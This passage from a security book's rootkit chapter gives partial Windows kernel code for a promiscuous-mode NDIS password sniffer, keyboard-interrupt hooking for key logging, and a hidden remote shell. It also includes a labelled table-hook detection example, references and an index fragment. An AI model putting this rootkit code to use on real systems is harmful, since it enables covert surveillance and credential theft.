        aProtocolChar.RequestCompleteHandler      = OnRequestDone;
        aProtocolChar.ReceiveHandler              = OnReceiveStub;
        aProtocolChar.ReceiveCompleteHandler      = OnReceiveDoneStub;
        aProtocolChar.StatusHandler               = OnStatus;
        aProtocolChar.StatusCompleteHandler       = OnStatusDone;
        aProtocolChar.Name                        = aProtoName;

        DbgPrint("ROOTKIT: Registering NDIS Protocol\n");

        NdisRegisterProtocol( &aStatus,
                              &aNdisProtocolHandle,
                              &aProtocolChar,
                              sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
        if (aStatus != NDIS_STATUS_SUCCESS)
        {
            DbgPrint("DriverEntry: ERROR NdisRegisterProtocol failed\n");
            return aStatus;
        }

        aDriverName.Length = 0;
        aDriverName.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH );
        if (aDriverName.Buffer == NULL)
        {
            return STATUS_INSUFFICIENT_RESOURCES;
        }
        aDriverName.MaximumLength = MAX_PATH_LENGTH;
        RtlZeroMemory(aDriverName.Buffer, MAX_PATH_LENGTH);

        /* _______________________________________________________________
         * get the name of the MAC-layer driver
         * and the name of the packet driver
         * HKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkage ..
         * _______________________________________________________________
         */
        if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS)
        {
            goto RegistryError;
        }
        ...
        NdisOpenAdapter( &aStatus,
                         &aErrorStatus,
                         &anOpenP->AdapterHandle,
                         &aDeviceExtension->Medium,
                         &aMediumArray,
                         1,
                         aDeviceExtension->NdisProtocolHandle,
                         anOpenP,
                         &aDeviceExtension->AdapterName,
                         0,
                         NULL);
        if (aStatus != NDIS_STATUS_PENDING)
        {
            /* completed synchronously: invoke the completion callback ourselves */
            OnOpenAdapterDone( anOpenP, aStatus, NDIS_STATUS_SUCCESS );
        }
        ...
    }




The first call is to NdisRegisterProtocol, which is how we register our callback functions. The second call is to ReadRegistry (explained later), which tells us the binding name for the network card. This information is used to initialize the device extension structure that is then used in a call to NdisOpenAdapter. If the call returns success, we must manually call OnOpenAdapterDone. If the call returns NDIS_STATUS_PENDING, this means that the OS is going to make a callback to OnOpenAdapterDone on our behalf.

Putting the Interface in Promiscuous Mode

When a network interface is in "promiscuous mode" it can sniff all packets that are physically delivered to the interface, regardless of target address. This is required if you want to see traffic that is destined for other machines on the network. We put the network interface card into promiscuous mode so the rootkit can sniff passwords and other communications channel information. This is performed in the OnOpenAdapterDone call. We use the NdisRequest function to set the interface into promiscuous mode:

    VOID OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
                            IN NDIS_STATUS Status,
                            IN NDIS_STATUS OpenErrorStatus )
    {
        PIRP           Irp  = NULL;
        POPEN_INSTANCE Open = NULL;
        NDIS_REQUEST   anNdisRequest;
        NDIS_STATUS    anotherStatus;   /* NdisRequest takes a PNDIS_STATUS, not a BOOLEAN */
        ULONG          aMode = NDIS_PACKET_TYPE_PROMISCUOUS;

        DbgPrint("ROOTKIT: OnOpenAdapterDone called\n");

        /* set card into promiscuous mode */
        if(gOpenInstance){
            //
            // Initializing the event
            //
            NdisInitializeEvent(&gOpenInstance->Event);
            anNdisRequest.RequestType = NdisRequestSetInformation;
            anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;
            anNdisRequest.DATA.SET_INFORMATION.InformationBuffer = &aMode;
            anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength = sizeof(ULONG);
            NdisRequest( &anotherStatus,
                         gOpenInstance->AdapterHandle,
                         &anNdisRequest );
        }
        return;
    }


Finding the Correct Network Card

Windows stores information about network cards in the following registry key:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards

Under this key are a series of numbered subkeys. Each subkey represents a network card or interface. The subkey contains a very important value called ServiceName. This value is a string that contains the GUID, which must be used to open the adapter. The rootkit driver must obtain one of these GUID strings to open a binding to the adapter using NDIS. The following code snippet obtains this GUID value for the first network interface listed:[9]

[9] Once again, all this code can be obtained from http://www.rootkit.com as part of the NTROOT rootkit driver.




    /* this is major work just to enum a subkey value */
    NTSTATUS EnumSubkeys( IN PWSTR           theRegistryPath,
                          IN PUNICODE_STRING theStringP
                        )
    {
        //----------------------------------------------------
        // for opening parent key
        HANDLE            hKey;
        OBJECT_ATTRIBUTES oa;
        NTSTATUS          Status;
        UNICODE_STRING    ParentPath;

        // for enumerating a subkey
        KEY_BASIC_INFORMATION  Info;
        PKEY_BASIC_INFORMATION pInfo;
        ULONG                  ResultLength;
        ULONG                  Size;
        PWSTR                  Position;
        PWSTR                  FullName;

        // for value query
        RTL_QUERY_REGISTRY_TABLE aParamTable[2];
        //----------------------------------------------------
        DbgPrint("rootkit: entered EnumSubkeys()\n");
        __try
        {
            RtlInitUnicodeString(&ParentPath, theRegistryPath);

            /*
            ** First try opening this key
            */
            InitializeObjectAttributes(&oa,
                                       &ParentPath,
                                       OBJ_CASE_INSENSITIVE,
                                       NULL,
                                       (PSECURITY_DESCRIPTOR)NULL);
            Status = ZwOpenKey(&hKey, KEY_READ, &oa);
            if (!NT_SUCCESS(Status)) {
                return Status;
            }

            /*
            ** First find the length of the subkey data.
            */
            Status = ZwEnumerateKey(hKey,
                                    0, /* index of zero */
                                    KeyBasicInformation,
                                    &Info,
                                    sizeof(Info),
                                    &ResultLength);
            if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) {
                ZwClose(hKey);   /* the key handle must not leak on error paths */
                return Status;
            }

            Size = Info.NameLength
                   + FIELD_OFFSET(KEY_BASIC_INFORMATION, Name[0]);

            pInfo = (PKEY_BASIC_INFORMATION) ExAllocatePool(PagedPool, Size);
            if (pInfo == NULL) {
                ZwClose(hKey);
                Status = STATUS_INSUFFICIENT_RESOURCES;
                return Status;
            }

            /*
            ** Now enumerate the first subkey.
            */
            Status = ZwEnumerateKey(hKey,
                                    0,
                                    KeyBasicInformation,
                                    pInfo,
                                    Size,
                                    &ResultLength);
            ZwClose(hKey);   /* no longer needed; the value query below uses the full path */
            if (!NT_SUCCESS(Status)) {
                ExFreePool((PVOID)pInfo);
                return Status;
            }
            if (Size != ResultLength) {
                ExFreePool((PVOID)pInfo);
                Status = STATUS_INTERNAL_ERROR;
                return Status;
            }

            /*
            ** Generate the fully expanded name and query values.
            */
            FullName = ExAllocatePool(PagedPool,
                                      ParentPath.Length +
                                      sizeof(WCHAR) +          // '\'
                                      pInfo->NameLength +
                                      sizeof(UNICODE_NULL));
            if (FullName == NULL) {
                ExFreePool((PVOID)pInfo);
                return STATUS_INSUFFICIENT_RESOURCES;
            }
            RtlCopyMemory((PVOID)FullName,
                          (PVOID)ParentPath.Buffer,
                          ParentPath.Length);
            Position = FullName + ParentPath.Length / sizeof(WCHAR);
            Position[0] = '\\';
            Position++;
            RtlCopyMemory((PVOID)Position,
                          (PVOID)pInfo->Name,
                          pInfo->NameLength);
            Position += pInfo->NameLength / sizeof(WCHAR);

            /*
            ** Null terminate.
            */
            Position[0] = UNICODE_NULL;
            ExFreePool((PVOID)pInfo);

            /*
            ** Get the value data for binding.
            */
            RtlZeroMemory( &aParamTable[0], sizeof(aParamTable) );
            aParamTable[0].Flags =
                RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED;
            aParamTable[0].Name = L"ServiceName";
            aParamTable[0].EntryContext = theStringP; /* will be allocated */

            // Because we are using required and direct,
            // we don't need to set defaults.
            // IMPORTANT note, the last entry is ALL NULL,
            // required by call to know when it's done.
            // Don't forget!
            Status = RtlQueryRegistryValues( RTL_REGISTRY_ABSOLUTE | RTL_REGISTRY_OPTIONAL,
                                             FullName,
                                             &aParamTable[0],
                                             NULL,
                                             NULL );

            ExFreePool((PVOID)FullName);
            return(Status);
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception in EnumSubkeys(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }


    /* ___________________________________________________________________________
     . This code reads the registry to determine the name of the network interface
     . card.  It grabs the first registered name, regardless of how many
     . are present.  It would be better to bind to all of them, but for
     . simplicity we are only binding to the first.
     . ___________________________________________________________________________ */
    NTSTATUS ReadRegistry( IN PUNICODE_STRING theBindingName )
    {
        NTSTATUS       aStatus;
        UNICODE_STRING aString;

        DbgPrint("ROOTKIT: ReadRegistry called\n");

        __try
        {
            aString.Length = 0;
            aString.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me */
            if (aString.Buffer == NULL) {
                return STATUS_INSUFFICIENT_RESOURCES;
            }
            aString.MaximumLength = MAX_PATH_LENGTH;
            RtlZeroMemory(aString.Buffer, MAX_PATH_LENGTH);

            /* single wide literal: "Windows NT" needs the space between the words */
            aStatus = EnumSubkeys(
                L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards",
                &aString );
            if(!NT_SUCCESS(aStatus)){
                DbgPrint("rootkit: RtlQueryRegistryValues failed Code = 0x%0x\n", aStatus);
            }
            else{
                RtlAppendUnicodeToString(theBindingName, L"\\Device\\");
                RtlAppendUnicodeStringToString(theBindingName, &aString);
                ExFreePool(aString.Buffer);
                return aStatus; /* we're good */
            }
            ExFreePool(aString.Buffer);
            return aStatus; /* last error */
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception occurred in ReadRegistry(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }

Using Boron Tags for Security

One nice trick to use to prevent people from detecting the rootkit network interface is to require a certain source port or IP ID value before the rootkit will respond to a packet. This idea can be extended to any data in the packet, but the key is that some obscure knowledge is required before the rootkit will respond. Remember that a rootkit can be compiled and customized by anyone, thus the choice of obfuscation is left up to your imagination.

Adding an Interactive Shell

A rootkit can have a remote TCP/IP shell directly into the kernel. Here is an example of the menu provided by one of the rootkits at www.rootkit.com:

    Win2K Rootkit by the team rootkit.com
    Version 0.4 alpha
    -----------------------------------------
    command        description
    ps             show proclist
    help           this data
    buffertest     debug output
    hidedir        hide prefixed file/dir
    hideproc       hide prefixed processes
    debugint       (BSOD)fire int3
    sniffkeys      toggle keyboard sniffer
    echo           echo the given string
    *(BSOD) means Blue Screen of Death
    if a kernel debugger is not present!
    *'prefixed' means the process or filename
    starts with the letters '_root_'.

Interrupts

Interrupts are a crucial part of any computational system. All external hardware must communicate with the CPU to initiate input and output operations. A subversive program may want to sniff or alter these input/output operations. This may be useful for providing stealth, setting up covert channels, or simply eavesdropping on a conversation.

Intel Interrupt Request (IRQ) Architecture

On a typical Intel or look-alike motherboard, the IRQ for the keyboard controller chip is IRQ 1 (there are a total of 16 IRQs). IRQ means interrupt request. Older systems allow the user to set the IRQ number for peripherals manually. Systems that use Plug n Play configure this information manually as well. Here is a table of IRQs (available from http://webopedia.com):

    IRQ 0   System timer
            This interrupt is reserved for the internal system timer. It is never available to peripherals or other devices.
    IRQ 1   Keyboard
            This interrupt is reserved for the keyboard controller. Even on devices without a keyboard, this interrupt is exclusively for keyboard input.
    IRQ 2   Cascade interrupt for IRQs 8–15
            This interrupt cascades the second interrupt controller to the first.
    IRQ 3   Second serial port (COM2)
            The interrupt for the second serial port and often the default interrupt for the fourth serial port (COM4).
    IRQ 4   First serial port (COM1)
            This interrupt is normally used for the first serial port. On devices that do not use a PS/2 mouse, this interrupt is almost always used by the serial mouse. This is also the default interrupt for the third serial port (COM3).
    IRQ 5   Sound card
            This interrupt is the first choice that most sound cards make when looking for an IRQ setting.
    IRQ 6   Floppy disk controller
            This interrupt is reserved for the floppy disk controller.
    IRQ 7   First parallel port
            This interrupt is normally reserved for the use of the printer. If a printer is not being used, this interrupt can be used for other devices that use parallel ports.
    IRQ 8   Real-time clock
            This interrupt is reserved for the system's real-time clock timer and cannot be used for any other purpose.
    IRQ 9   Open interrupt
            This interrupt is typically left open on devices for the use of peripherals.
    IRQ 10  Open interrupt
            This interrupt is typically left open on devices for the use of peripherals.
    IRQ 11  Open interrupt
            This interrupt is typically left open on devices for the use of peripherals.
    IRQ 12  PS/2 mouse
            This interrupt is reserved for the PS/2 mouse on machines that use one. If a PS/2 mouse is not used, the interrupt can be used for other peripherals, such as a network card.
    IRQ 13  Floating point unit/coprocessor
            This interrupt is reserved for the integrated floating point unit. It is never available to peripherals or other devices because it is used exclusively for internal signaling.
    IRQ 14  Primary IDE channel
            This interrupt is reserved for use by the primary IDE controller. On systems that do not use IDE devices, the IRQ can be used for another purpose.
    IRQ 15  Secondary IDE channel
            This interrupt is reserved for use by the secondary IDE controller.

The IDT supports 256 entries, only 16 of which are typically utilized as hardware interrupts on an x86 system. The IDT contains an array of 8-byte segment descriptors called gates. The IDT must always be in unswapped memory.

Hooking the Interrupt Descriptor Table (IDT)

Under Windows NT, interrupts handle many important system events. Interrupt 0x2E, for example, is called for every system call. Even though our rootkit examples show how to hook system calls on an individual basis, we could also hook interrupt 2E directly. We can also hook other interrupts, such as the keyboard interrupt, and thus intercept keystrokes. An interrupt hook can be installed with the following code: [the code listing is an image in the original and was not captured here]




The Mystery of the Programmable Interrupt Controller (PIC)

If you have ever worked with interrupt hooks, you will realize that the IRQ numbers assigned to hardware do not map directly to the interrupt descriptor table. For example, the IRQ for the keyboard hardware is IRQ 1, but interrupt 1 is not the keyboard! How can this be? Clearly, there is a translation occurring between the hardware IRQs and the interrupt vectors stored in the interrupt descriptor table. The secret lies in the PIC. On most motherboards this will be an Intel 8259 or compatible chip. The 8259 can be programmed to map the IRQ numbers to software interrupts. This means the hard-wired IRQ lines enter one side of the 8259, and a single interrupt line comes out the other side. The 8259 handles the conversion to a software interrupt and informs the CPU that a given software interrupt has occurred. There are typically 16 hardware interrupt lines handled by the 8259. By default, most BIOS software will program the 8259 on boot to map IRQs 0–7 to software interrupts 8–15. Thus, IRQ 1 for the keyboard is handled as interrupt 8. Thus the mystery of IRQ to interrupt is solved.

Under Windows NT/2000/XP you will find that the old int-9 hook doesn't work for the keyboard. The reason is that the 8259 has been reprogrammed by Windows to map IRQ 0–15 to software interrupts 0x30–0x3F. Thus, to hook the keyboard interrupt under Windows you need to hook interrupt 0x31. A second mystery solved.

You can, of course, reprogram the 8259 yourself. We now present some additional stealth tricks for a rootkit driver. The following code snippet illustrates reprogramming the 8259 so that IRQ 0–7 are mapped to software interrupts 20h–27h:




    mov     al, 11h         ; ICW1: start initialization sequence, ICW4 will follow
    out     20h, al         ; master 8259 command port
    out     0A0h, al        ; slave 8259 command port
    mov     al, 20h         ; starting interrupt number 20h
    out     21h, al         ; 21h for IRQ 0-7
    mov     al, 28h         ; starting interrupt number 28h
    out     0A1h, al        ; A1h for IRQ 8-15
    mov     al, 04h         ; ICW3 (master): slave is cascaded on IRQ 2
    out     21h, al
    mov     al, 02h         ; ICW3 (slave): cascade identity 2
    out     0A1h, al
    mov     al, 01h         ; ICW4: 8086 mode
    out     21h, al
    out     0A1h, al


Key Logging

Key logging is one of the most powerful spyware techniques. Using a hook on the keyboard handler within the kernel, the rootkit can sniff pass phrases, including those used to unlock private keys in a cryptographic system. A keystroke log does not take up much space and can log activity for days or weeks before the attacker needs to pick up the log file. The keystroke logger can detect control key combinations as well as normal characters in upper or lower case. Typically each keystroke is referred to as a scan code. A scancode is the numerical representation of the keystroke in memory.

Key loggers have taken many forms over the last decade, and the technique depends on the OS being infected. On many older Windows and DOS machines, hooking interrupt 9 was enough to gather keystrokes. On Windows NT and beyond, the keystroke monitor must be installed as a driver. Similar conditions exist under Linux.

From the attacker's perspective, the following two issues remain: how the data are stored in the file, and who they are sent to over the network. If keystrokes are stored in plain text, then those keystrokes are available to all rogue interlopers. If they are sent to someone's email address, then that person will be interrogated. These issues can be resolved using cryptography. The keystrokes can be stored in public-key encrypted form, and they are broadcast over a publically readable yet obscure channel. A cryptotrojan attack that uses this approach was published by Young and Yung at IEEE Security and Privacy.

Linux Key Logger

A couple of Linux key loggers have been published and the source code is available. These programs typically operate as loadable kernel modules (lkms). Under a UNIX system, the rootkit is usually already implemented as an lkm, so keystroke monitoring is just an extension of the code. A Linux rootkit can hook into the character stream via the existing keyboard driver or it can hook the interrupt handler for the keyboard directly.

Windows NT/2000/XP Key Logger

Windows NT/2000/XP supports a special type of device driver called a filter driver. Most drivers under Windows are placed into chains. That is, each driver passes data to the next driver in a chain. A filter driver simply inserts itself into a chain and siphons data or modifies data in transit before passing control. There is already a keyboard driver chain into which a rootkit can insert itself. Of course, the keyboard interrupt can also be hooked directly. Either way, keystrokes can be captured and logged to a file, or sent over the network.

The Keyboard Controller Chip

On the system motherboard there are many hardware controller chips. These chips contain registers that can be read or written to. Typically, read/write registers on controller chips are called ports. A keyboard will usually contain an 8048 microprocessor. The motherboard will usually have an additional 8042 microprocessor. The 8042 will be programmed to convert scan codes from the keyboard. Sometimes the 8042 will also be handling PS/2 mouse input and possibly the reset switch for the CPU. For the keyboard controller, we are interested in the following ports:

    Port 0x60: 8048 chip, keyboard data register
    Port 0x64: 8042, keyboard status register

To read characters from the keyboard, you must hook the keyboard interrupt. This will change depending on your OS. For a Windows system, the hook will most likely be int 0x31. Once IRQ 1 has fired, the data must be read from 0x60 before any more keyboard interrupts will occur. Here is a simple handler for the keyboard interrupt:

    KEY_INT:
        push    eax
        in      al, 60h                   ; read the scan code from the keyboard data register
        ; do something with character in al
        pop     eax
        jmp     DWORD PTR [old_KEY_INT]   ; chain to the original handler

Advanced Rootkit Topics

There isn't enough room in this book to cover all the advanced tricks that can be performed by rootkits. Fortunately, there are many resources and articles available on the Internet that cover this subject. One great resource is Phrack Magazine (http://www.phrack.com). Another is the Black Hat security conference (http://www.blackhat.com). We briefly describe a small set of advanced techniques here, providing references to more information when applicable.

Using a Rootkit as a Debugger

A kernel rootkit doesn't have to be malicious. You can use one to keep watch on a system you own. One great use of a rootkit is to replicate the functions of a debugger. A rootkit with a shell and some debugging functions is really no different than a debugger like SoftIce. You can add a decompiler, the ability to read and write memory, and breakpoint support.

Disabling Windows System File Protection

The winlogon.exe process loads a few DLLs that are responsible for implementing system file protection. The file sfc.dll is loaded, followed by sfcfiles.dll. The list of files to be protected is loaded into a memory buffer. A simple patch can be made to the code within sfc.dll that will disable all file protection. The patch can be made using standard Windows debugging APIs.[10]

[10] For more on this issue, see 29/A Labs publications for work by Benny and Ratter.

Writing Directly to Physical Memory

A rootkit does not need to use a loadable module or Windows device driver. A rootkit can be installed by simply writing to data structures in the kernel. An excellent article on Windows objects and physical memory is available in Phrack Magazine, Issue 59, Article 16: "Playing with Windows /dev/(k)mem" by crazylord.

Kernel Buffer Overflows

Code in the kernel is subject to the same bugs that affect all other software. Just because code is running in the kernel doesn't mean it's immune to stack overflows and other standard-issue exploits. In fact, several kernel-level overflows have been made public. Exploiting a buffer overflow in the kernel is a bit tricky because exceptions in the kernel tend to crash the machine or cause a "blue screen of death." Exploits of the kernel are especially noteworthy because they can directly infect a machine with a rootkit and they bypass all security mechanisms. An attacker does not need administrative privileges or the ability to load a device driver if they can simply overflow the kernel stack. An article on kernel overflows can be found in Phrack Magazine, issue 60, article 6: "Smashing The Kernel Stack For Fun And Profit" by Sinan "noir" Eren.

Infecting the Kernel Image

Another way to get code into the kernel is to patch the kernel image itself. We illustrate in this chapter a simple patch to remove security controls from the NT kernel. Any piece of code can be modified in such a way. One needs to be sure to correct any integrity checks in the code, such as the file checksum. An article on patching the Linux kernel can be found in Phrack Magazine, Issue 60, Article 8: "Static Kernel Patching" by jbtzhm.

Execute Redirection

We also illustrate how to redirect execution under Windows. For a good discussion on how to perform execute redirection under Linux, see "Advances in Kernel Hacking II" in Phrack Magazine, Issue 59, Article 5, by palmers.

Detecting Rootkits

There are several methods to detect rootkits, all of which can be circumvented if the rootkit itself is aware of the trick. Patched memory can be detected by reading the call tables or functions and checking their values. Instructions can be counted during runtime and compared with a baseline. Any sort of behavior changes can, in theory, be detected. The key weakness is when the code that performs this sort of check lives on the same machine that has been compromised. At this point, the rootkit can subvert the code that performs the check. An interesting trick to detect a rootkit is discussed in Phrack Magazine, Issue 59, Article 10, "Execution Path Analysis: Finding Kernel Based Rootkits" by Jan K. Rutkowski. A tool to detect rootkits in the Solaris kernel can be downloaded from http://www.immunitysec.com.
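The "read the call tables or functions and check their values" check described under Detecting Rootkits, which is also the natural counter to the IDT and system call hooks covered earlier in the chapter, as an added C example that is not code from the book: a user-space stand-in dispatch table is baselined (pointer plus a CRC of each routine's first bytes) and re-verified, so a swapped entry or a patched prologue is reported by index. The service routines, the table, PROLOGUE_BYTES and the simulated hook are all constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TABLE_SIZE     4
#define PROLOGUE_BYTES 16

typedef int (*service_fn)(int);

/* Constructed stand-in services; in a kernel these would be the routines
 * a system call table entry or an IDT gate dispatches to. */
static int svc_open(int x)  { return x + 1; }
static int svc_read(int x)  { return x * 2; }
static int svc_write(int x) { return x - 1; }
static int svc_close(int x) { return x ^ 0x55; }

/* The dispatch table under protection (writable, as a real one is). */
service_fn service_table[TABLE_SIZE] = { svc_open, svc_read, svc_write, svc_close };

/* Baseline per entry: the pointer plus a CRC of the routine's first bytes,
 * so a swapped pointer and an overwritten prologue are both caught. */
typedef struct {
    service_fn ptr;
    uint32_t   prologue_crc;
} table_baseline_t;

/* Standard reflected CRC-32 (poly 0xEDB88320); crc32("123456789") == 0xCBF43926. */
uint32_t crc32(const void *data, size_t len)
{
    const uint8_t *p = (const uint8_t *)data;
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* CRC of the first PROLOGUE_BYTES of a routine's machine code.  The union
 * sidesteps the ISO C rule against casting a function pointer to void *. */
static uint32_t prologue_crc(service_fn fn)
{
    union { service_fn f; const uint8_t *b; } u;
    u.f = fn;
    return crc32(u.b, PROLOGUE_BYTES);
}

/* Record a trusted baseline of n entries.  Take it before exposure and keep
 * it off the machine being checked: a rootkit on the same box can subvert it. */
void take_baseline(const service_fn *table, table_baseline_t *out, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        out[i].ptr          = table[i];
        out[i].prologue_crc = prologue_crc(table[i]);
    }
}

/* Compare the live table with the baseline.  Returns the number of changed
 * entries and writes their indexes to changed[] (caller supplies n slots). */
size_t verify_table(const service_fn *table, const table_baseline_t *base,
                    size_t n, size_t *changed)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        int ptr_moved   = table[i] != base[i].ptr;
        int body_edited = prologue_crc(table[i]) != base[i].prologue_crc;
        if (ptr_moved || body_edited)
            changed[hits++] = i;
    }
    return hits;
}

/* Scenario: a clean table verifies, a constructed table hook on entry 1 is
 * reported, and the restored table verifies again.  Returns 1 on success. */
int demo_detect_hook(void)
{
    table_baseline_t base[TABLE_SIZE];
    size_t changed[TABLE_SIZE];
    service_fn original = service_table[1];

    take_baseline(service_table, base, TABLE_SIZE);
    if (verify_table(service_table, base, TABLE_SIZE, changed) != 0)
        return 0;

    service_table[1] = svc_close;          /* stand-in for a table hook */
    size_t hits = verify_table(service_table, base, TABLE_SIZE, changed);
    service_table[1] = original;           /* restore the entry */
    if (hits != 1 || changed[0] != 1)
        return 0;

    return verify_table(service_table, base, TABLE_SIZE, changed) == 0;
}

int main(void)
{
    printf("dispatch table hook detection: %s\n", demo_detect_hook() ? "detected" : "FAILED");
    return 0;
}
```

The same baseline-and-compare shape applies to a real IDT or system call table, with the caveat the chapter states: the baseline and the checker must live somewhere the rootkit cannot reach.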


Conclusion

The ultimate end to most software exploits involves the installation of a rootkit. Rootkits provide a way for attackers to return at will to machines that they "own." Thus rootkits, like the one we discuss in this chapter, are extremely powerful. Ultimately, rootkits can be used to control every aspect of a machine. They do this by installing themselves deep in the heart of a system.

Rootkits may be run locally or they may arrive via some other vector, like a worm or a virus. Like other kinds of malicious code, rootkits thrive on stealthiness. They hide themselves away from standard system observers, using hooks, trampolines, and patches to get their work done. In this chapter, we have only scratched the surface of rootkits—a subject deserving a book of its own.


References

Aleph1. (1996) "Smashing the Stack for Fun and Profit." Phrack 49. November.

Anderson, J. P. (1973) Computer Security Technology Planning Study. Report no. ESD-TR-73-51. Bedford, MA: USAF Electronic Systems Division, Hanscom AFB; October.

Anderson, Ross. (2001) Security Engineering. New York: John Wiley & Sons.

Cheswick, William R., Steven M. Bellovin, and Aviel D. Rubin. (2003) Firewalls and Internet Security. 2nd ed. Boston, MA: Addison-Wesley.

Cowan, Crispin, Calton Pu, David Maier, Heather Hinton, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle, and Qian Zhang. (1998) "Automatic Detection and Prevention of Buffer-Overflow Attacks." In: Proceedings of the 7th USENIX Security Symposium. San Antonio, TX: January. Also available at http://www.immunix.org/documentation.html.

Dekker, Edward N., and Joseph M. Newcomer. (1999) Developing Windows NT Device Drivers: A Programmer's Handbook. Boston, MA: Addison-Wesley.

Denning, Dorothy E. (1999) Information Warfare & Security. Reading, MA: Addison-Wesley.

Felten, Ed, Dirk Balfanz, Drew Dean, and Dan Wallach. (1997) "Web Spoofing: An Internet Con Game." In: Proceedings of the 20th NISSC. October. Baltimore, MD.

Gamma, Erich, Richard Helm, Ralph Johnson, and John M. Vlissides. (1995) Design Patterns: Elements of Reusable Object-Oriented Software. Reading, MA: Addison-Wesley.

Howard, Michael, and David LeBlanc. (2002) Writing Secure Code. Seattle: Microsoft Press.

Jones, Andy, Gerald L. Kovacich, and Perry G. Luzwick. (2002) Global Information Warfare: How Businesses, Governments, and Others Achieve Objectives and Attain Competitive Advantages. New York: Auerbach Publishing.

Kaner, Cem, and David L. Pels. (1998) Bad Software: What to Do When Software Fails. New York: John Wiley & Sons.

Krsul, Ivan. (1998) Software Vulnerability Analysis. PhD thesis, COAST TR 98-09. West Lafayette, IN: Department of Computer Sciences, Purdue University.

Landwehr, Carl E., A. R. Bull, J. P. McDermott, and W. S. Choi. (1993) A Taxonomy of Computer Program Security Flaws, with Examples. Naval Research Laboratory report no. NRL/FR/5542-93/9591. Washington, DC.

McClure, Stuart, Joel Scambray, and George Kurtz. (1999) Hacking Exposed: Network Security Secrets and Solutions. New York: Osborne.

McGraw, Gary, and Ed Felten. (1998) Securing Java: Getting Down to Business with Mobile Code. New York: John Wiley & Sons.

Mish, F. C., et al., eds. (1997) Merriam-Webster's Collegiate Dictionary. 10th ed. Springfield, MA: Merriam-Webster, Inc., p. 1117.

Myhrvold, Nathan. (1995) "The Physicist." Wired Magazine. Issue 3(9). Available at www.wired.com/wired/archive/3.09/myhrvold.html?person=gordon_moore&topic_set=wiredpeople. September 1995. Accessed 1/6/03.

Neumann, Peter G. (1995) Computer-Related Risks. Reading, MA: Addison-Wesley.

Potter, Bruce, and Bob Fleck. (2003) 802.11 Security. Sebastopol, CA: O'Reilly and Associates.

Rubin, Aviel. (2001) The White-Hat Security Arsenal: Tackling the Threats. Boston, MA: Addison-Wesley.

Schmid, Matt, and Anup Ghosh. (1999) An Approach to Testing COTS Software for Robustness to Operating System Exceptions and Errors. Presented at the 1999 International Symposium on Software Reliability Engineering. Boca Raton, FL. November 1–4.

Schneier, Bruce. (2000) Secrets and Lies: Digital Security in a Networked World. New York: John Wiley & Sons.

Spitzner, Lance. (2003) Honeypots: Tracking Hackers. Boston, MA: Addison-Wesley.

Thompson, Ken. (1984) "Reflections on Trusting Trust." Communications of the ACM, 27(8).

Viega, John, and Gary McGraw. (2002) Building Secure Software: How to Avoid Security Problems the Right Way. Boston, MA: Addison-Wesley.

Voas, Jeff, and Gary McGraw. (1999) Software Fault Injection: Inoculating Software Against Errors. New York: John Wiley & Sons.

Whittaker, James A. (2002) How to Break Software: A Practical Guide to Testing. Boston, MA: Addison-Wesley.

Whittaker, James, and Herbert Thompson. (2003) How to Break Software Security. Boston, MA: Addison-Wesley.

Young, Adam, and Moti Yung. (1997) Deniable Password Snatching: On the Possibility of Evasive Electronic Espionage. In: Proceedings of the IEEE Symposium on Security and Privacy. Oakland, CA. pp. 224–235.

Zuse, Horst. (1991) Software Complexity: Measures and Methods (Programming Complex Systems, no. 4). Berlin: Walter de Gruyter.



Index

[SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] [Z]

[SYMBOL]

%00u format token 2nd 3rd
%n format token 2nd
%s format string 2nd
.CALL instruction
.END instruction
.ENTER instruction
.LEAVE instruction
.NET
  and Java 2nd
  extensibility of 2nd
  future of
.PROC instruction
.PROCEND instruction
/GS compiler option 2nd 3rd 4th 5th
__security_check_cookie function
__security_error_handler function
_set_security_error_handler function
0day exploits
  IDSs for
  undisclosed
430TX chips
8048 chips
82439TX chips
82559 chips 2nd
93C46 chips

[A]

Access
  low-level disk 2nd
  root
  to executable files 2nd
Access Control Lists (ACLs)
Access requirement audits
Activating payloads 2nd
Activation zones in injection vectors 2nd
Active armor
ActiveX
  and Web browsers 2nd
  preloader, local filenames with
add_long_cmt function
Adding users
Address resolution protocol (ARP)
  cache poisoning attacks in
  packet leaking in 2nd
Address-based arithmetic 2nd
Addresses
  effective
  in injection vectors
  IP 2nd
ADM (Association De Malfaiteurs)
ADM w0rm
Administrator access, need for
Adoption rates of technologies
Aggregation elements
AIX/PowerPC payloads 2nd 3rd 4th 5th
Akkerman, Wichert
Alchemy Eye Network attacks 2nd
Allocated memory in heap overflows 2nd 3rd 4th 5th
Alternate encoding [See Equivalent input and requests]
Alternative IP addresses
AN/SPS-73 radar system
Analog in-band switching signals
Analytical Engine
AND operator
Anomaly-based IDSs 2nd
Anti-aircraft radar systems
Apache HTTPD, overflow in
API calls
